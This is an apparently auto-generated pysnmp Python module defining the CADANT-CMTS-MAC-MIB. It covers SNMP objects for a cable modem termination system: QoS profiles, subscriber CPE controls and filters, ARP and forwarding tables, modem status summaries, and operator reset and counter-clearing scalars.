cadIfCmtsServiceAdminStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2), ("destroyed", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsServiceAdminStatus.setStatus('current')
cadIfCmtsServiceQosProfile = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16383))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsServiceQosProfile.setStatus('current')
cadIfCmtsServiceCreateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 5), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsServiceCreateTime.setStatus('current')
cadIfQosProfPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfPriority.setStatus('current')
cadIfQosProfMaxUpBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 100000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfMaxUpBandwidth.setStatus('current')
cadIfQosProfGuarUpBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 100000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfGuarUpBandwidth.setStatus('current')
cadIfQosProfMaxDownBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 100000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfMaxDownBandwidth.setStatus('current')
cadIfQosProfMaxTxBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfMaxTxBurst.setStatus('current')
cadIfQosProfBaselinePrivacy = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 13), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfBaselinePrivacy.setStatus('current')
cadIfCmtsPtrToMacTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 5), )
if mibBuilder.loadTexts: cadIfCmtsPtrToMacTable.setStatus('current')
cadIfCmtsPtrToMacEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 5, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmPtr"))
if mibBuilder.loadTexts: cadIfCmtsPtrToMacEntry.setStatus('current')
cadIfCmtsCmPtr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 5, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647)))
if mibBuilder.loadTexts: cadIfCmtsCmPtr.setStatus('current')
cadIfCmtsCmMac = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 5, 1, 2), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmMac.setStatus('current')
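# cadSubMgtCpeControlTable: per-CM subscriber management limits (max CPE IPv4/IPv6 addresses, learnable/reset flags);
# augments cadIfCmtsCmStatusEntry.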
cadSubMgtCpeControlTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6), )
if mibBuilder.loadTexts: cadSubMgtCpeControlTable.setStatus('current')
cadSubMgtCpeControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1), )
cadIfCmtsCmStatusEntry.registerAugmentions(("CADANT-CMTS-MAC-MIB", "cadSubMgtCpeControlEntry"))
cadSubMgtCpeControlEntry.setIndexNames(*cadIfCmtsCmStatusEntry.getIndexNames())
if mibBuilder.loadTexts: cadSubMgtCpeControlEntry.setStatus('current')
cadSubMgtCpeControlMaxCpeIpv4 = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1023))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeControlMaxCpeIpv4.setStatus('current')
cadSubMgtCpeControlActive = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeControlActive.setStatus('current')
cadSubMgtCpeControlLearnable = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1, 3), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeControlLearnable.setStatus('current')
cadSubMgtCpeControlReset = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1, 4), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeControlReset.setStatus('current')
cadSubMgtCpeControlMaxCpeIpv6Addresses = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1023))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeControlMaxCpeIpv6Addresses.setStatus('current')
cadSubMgtCpeControlLastReset = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1, 6), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeControlLastReset.setStatus('current')
cadSubMgtCpeIpTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7), )
if mibBuilder.loadTexts: cadSubMgtCpeIpTable.setStatus('current')
cadSubMgtCpeIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusMacAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadSubMgtCpeIpIndex"))
if mibBuilder.loadTexts: cadSubMgtCpeIpEntry.setStatus('current')
cadSubMgtCpeIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 1024)))
if mibBuilder.loadTexts: cadSubMgtCpeIpIndex.setStatus('current')
cadSubMgtCpeIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 2), InetAddressIPv4or6()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeIpAddr.setStatus('current')
cadSubMgtCpeIpLearned = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 3), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeIpLearned.setStatus('current')
cadSubMgtCpeIpMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 4), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeIpMacAddr.setStatus('current')
cadSubMgtCpeFilterDownstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1024))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeFilterDownstream.setStatus('current')
cadSubMgtCpeFilterUpstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1024))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeFilterUpstream.setStatus('current')
cadSubMgtCpeCpeType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("cpe", 1), ("ps", 2), ("mta", 3), ("stb", 4), ("tea", 5), ("erouter", 6))).clone('cpe')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeCpeType.setStatus('current')
cadSubMgtCpeIpAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 8), InetAddressType().clone('ipv4')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeIpAddrType.setStatus('current')
cadSubMgtCmFilterTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8), )
if mibBuilder.loadTexts: cadSubMgtCmFilterTable.setStatus('current')
cadSubMgtCmFilterEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusMacAddress"))
if mibBuilder.loadTexts: cadSubMgtCmFilterEntry.setStatus('current')
cadSubMgtSubFilterDownstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtSubFilterDownstream.setStatus('current')
cadSubMgtSubFilterUpstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtSubFilterUpstream.setStatus('current')
cadSubMgtCmFilterDownstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCmFilterDownstream.setStatus('current')
cadSubMgtCmFilterUpstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCmFilterUpstream.setStatus('current')
cadSubMgtPsFilterDownstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtPsFilterDownstream.setStatus('current')
cadSubMgtPsFilterUpstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtPsFilterUpstream.setStatus('current')
cadSubMgtMtaFilterDownstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtMtaFilterDownstream.setStatus('current')
cadSubMgtMtaFilterUpstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtMtaFilterUpstream.setStatus('current')
cadSubMgtStbFilterDownstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtStbFilterDownstream.setStatus('current')
cadSubMgtStbFilterUpstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtStbFilterUpstream.setStatus('current')
cadTpFdbTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 9), )
if mibBuilder.loadTexts: cadTpFdbTable.setStatus('current')
cadTpFdbEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 9, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadTpFdbAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadTpFdbIfIndex"))
if mibBuilder.loadTexts: cadTpFdbEntry.setStatus('current')
cadTpFdbAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 9, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadTpFdbAddress.setStatus('current')
cadTpFdbIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 9, 1, 2), InterfaceIndex())
if mibBuilder.loadTexts: cadTpFdbIfIndex.setStatus('current')
cadTpFdbStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 9, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("other", 1), ("invalid", 2), ("learned", 3), ("self", 4), ("mgmt", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadTpFdbStatus.setStatus('current')
cadIfQosProfileLookupTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 10), )
if mibBuilder.loadTexts: cadIfQosProfileLookupTable.setStatus('current')
cadIfQosProfileLookupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 10, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfQosProfPriority"), (0, "CADANT-CMTS-MAC-MIB", "cadIfQosProfMaxUpBandwidth"), (0, "CADANT-CMTS-MAC-MIB", "cadIfQosProfGuarUpBandwidth"), (0, "CADANT-CMTS-MAC-MIB", "cadIfQosProfMaxDownBandwidth"), (0, "CADANT-CMTS-MAC-MIB", "cadIfQosProfMaxTxBurst"), (0, "CADANT-CMTS-MAC-MIB", "cadIfQosProfBaselinePrivacy"))
if mibBuilder.loadTexts: cadIfQosProfileLookupEntry.setStatus('current')
cadIfQosProfileLookupIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 10, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16383))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfileLookupIndex.setStatus('current')
cadIfQosProfileLookupRefCount = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 10, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfileLookupRefCount.setStatus('current')
cadChannelToCmTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 11), )
if mibBuilder.loadTexts: cadChannelToCmTable.setStatus('current')
cadChannelToCmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 11, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIf3CmtsCmRegStatusMdIfIndex"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusMacAddress"))
if mibBuilder.loadTexts: cadChannelToCmEntry.setStatus('current')
cadChannelToCmPtr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 11, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadChannelToCmPtr.setStatus('current')
cadCmtsCmStatusSummaryTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12), )
if mibBuilder.loadTexts: cadCmtsCmStatusSummaryTable.setStatus('deprecated')
cadCmtsCmStatusSummaryEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusDownChannelIfIndex"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusUpChannelIfIndex"))
if mibBuilder.loadTexts: cadCmtsCmStatusSummaryEntry.setStatus('deprecated')
cadCmtsCmStatusNumOther = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumOther.setStatus('deprecated')
cadCmtsCmStatusNumRanging = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRanging.setStatus('deprecated')
cadCmtsCmStatusNumRangingAborted = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRangingAborted.setStatus('deprecated')
cadCmtsCmStatusNumRangingComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRangingComplete.setStatus('deprecated')
cadCmtsCmStatusNumIpComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumIpComplete.setStatus('deprecated')
cadCmtsCmStatusNumRegistrationComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRegistrationComplete.setStatus('deprecated')
cadCmtsCmStatusNumAccessDenied = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumAccessDenied.setStatus('deprecated')
cadCmtsCmStatusNumRangFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRangFlaps.setStatus('deprecated')
cadCmtsCmStatusNumProvFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumProvFlaps.setStatus('deprecated')
cadCmtsCmStatusNumRegFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRegFlaps.setStatus('deprecated')
cadCmtsCmStatusNumOperational = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumOperational.setStatus('deprecated')
cadCmtsCmStatusNumRegisteredBpiInitializing = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRegisteredBpiInitializing.setStatus('deprecated')
cadCmtsCmStatusNumTotal = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumTotal.setStatus('deprecated')
cadCmtsCmStatusNumActive = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumActive.setStatus('deprecated')
cadCmtsCmStatusNumRegistered = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRegistered.setStatus('deprecated')
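# cadArpTable: ARP/neighbor cache entries, indexed by interface, address type, network address and L3 ifIndex.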
cadArpTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13), )
if mibBuilder.loadTexts: cadArpTable.setStatus('current')
cadArpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadArpIfIndex"), (0, "CADANT-CMTS-MAC-MIB", "cadArpAddressType"), (0, "CADANT-CMTS-MAC-MIB", "cadArpNetAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadArpL3IfIndex"))
if mibBuilder.loadTexts: cadArpEntry.setStatus('current')
cadArpIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: cadArpIfIndex.setStatus('current')
cadArpAddressType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 2), InetAddressType())
if mibBuilder.loadTexts: cadArpAddressType.setStatus('current')
cadArpNetAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 3), InetAddressIPv4or6())
if mibBuilder.loadTexts: cadArpNetAddress.setStatus('current')
cadArpMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 4), MacAddress()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadArpMacAddress.setStatus('current')
cadArpType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("other", 1), ("invalid", 2), ("dynamic", 3), ("static", 4), ("local", 5))).clone('static')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadArpType.setStatus('current')
cadArpState = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7))).clone(namedValues=NamedValues(("reachable", 1), ("stale", 2), ("delay", 3), ("probe", 4), ("invalid", 5), ("unknown", 6), ("incomplete", 7))).clone('unknown')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadArpState.setStatus('current')
cadArpL3IfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 7), InterfaceIndexOrZero())
if mibBuilder.loadTexts: cadArpL3IfIndex.setStatus('current')
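# cadMacControl: writable scalars for operator actions (clear flap/deny/penalty counters, reset or delete a CM by MAC address).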
cadMacControl = MibIdentifier((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14))
cadMacClearFlapCounts = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 1), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearFlapCounts.setStatus('current')
cadMacResetCMMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 2), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacResetCMMacAddress.setStatus('current')
cadMacDeleteMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 3), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacDeleteMacAddress.setStatus('current')
cadMacClearDenyCounts = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 4), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearDenyCounts.setStatus('current')
cadMacClearDenyCountMacAddr = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 5), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearDenyCountMacAddr.setStatus('current')
cadMacClearFlapCountMacAddr = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 6), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearFlapCountMacAddr.setStatus('current')
cadMacRecalculateCmSummaryIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 7), InterfaceIndexOrZero()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacRecalculateCmSummaryIfIndex.setStatus('current')
cadMacClearFlapCountsByIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 8), InterfaceIndexOrZero()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearFlapCountsByIfIndex.setStatus('current')
cadMacClearPenaltyCounts = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 9), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearPenaltyCounts.setStatus('current')
cadMacClearPenaltyCountsByIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 10), InterfaceIndexOrZero()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearPenaltyCountsByIfIndex.setStatus('current')
cadMacClearPenaltyCountMacAddr = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 11), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearPenaltyCountMacAddr.setStatus('current')
cadMacClearPenaltyCountScn = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 12), SnmpAdminString().clone(' ')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearPenaltyCountScn.setStatus('current')
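# cadQosCmtsMacToSrvFlowTable: maps a CM MAC address to its DOCSIS service flow IDs and the associated ifIndex.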
cadQosCmtsMacToSrvFlowTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 15), )
if mibBuilder.loadTexts: cadQosCmtsMacToSrvFlowTable.setStatus('current')
cadQosCmtsMacToSrvFlowEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 15, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadQosCmtsCmMac"), (0, "CADANT-CMTS-MAC-MIB", "cadQosCmtsServiceFlowId"))
if mibBuilder.loadTexts: cadQosCmtsMacToSrvFlowEntry.setStatus('current')
cadQosCmtsCmMac = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 15, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadQosCmtsCmMac.setStatus('current')
cadQosCmtsServiceFlowId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 15, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadQosCmtsServiceFlowId.setStatus('current')
cadQosCmtsIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 15, 1, 3), InterfaceIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadQosCmtsIfIndex.setStatus('current')
cadQosServiceClassTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 19), )
if mibBuilder.loadTexts: cadQosServiceClassTable.setStatus('current')
cadQosServiceClassEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 19, 1), )
docsQosServiceClassEntry.registerAugmentions(("CADANT-CMTS-MAC-MIB", "cadQosServiceClassEntry"))
cadQosServiceClassEntry.setIndexNames(*docsQosServiceClassEntry.getIndexNames())
if mibBuilder.loadTexts: cadQosServiceClassEntry.setStatus('current')
cadQosServiceClassPeakTrafficRate = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 19, 1, 1), BitRate()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadQosServiceClassPeakTrafficRate.setStatus('current')
cadQosServiceClassLatencyControlledFlowFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 19, 1, 2), TruthValue().clone('false')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadQosServiceClassLatencyControlledFlowFlag.setStatus('current')
cadCmtsCmVendorTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 20), )
if mibBuilder.loadTexts: cadCmtsCmVendorTable.setStatus('current')
cadCmtsCmVendorEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 20, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadCmtsCmVendorOUI"))
if mibBuilder.loadTexts: cadCmtsCmVendorEntry.setStatus('current')
cadCmtsCmVendorOUI = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 20, 1, 1), OUIAddress())
if mibBuilder.loadTexts: cadCmtsCmVendorOUI.setStatus('current')
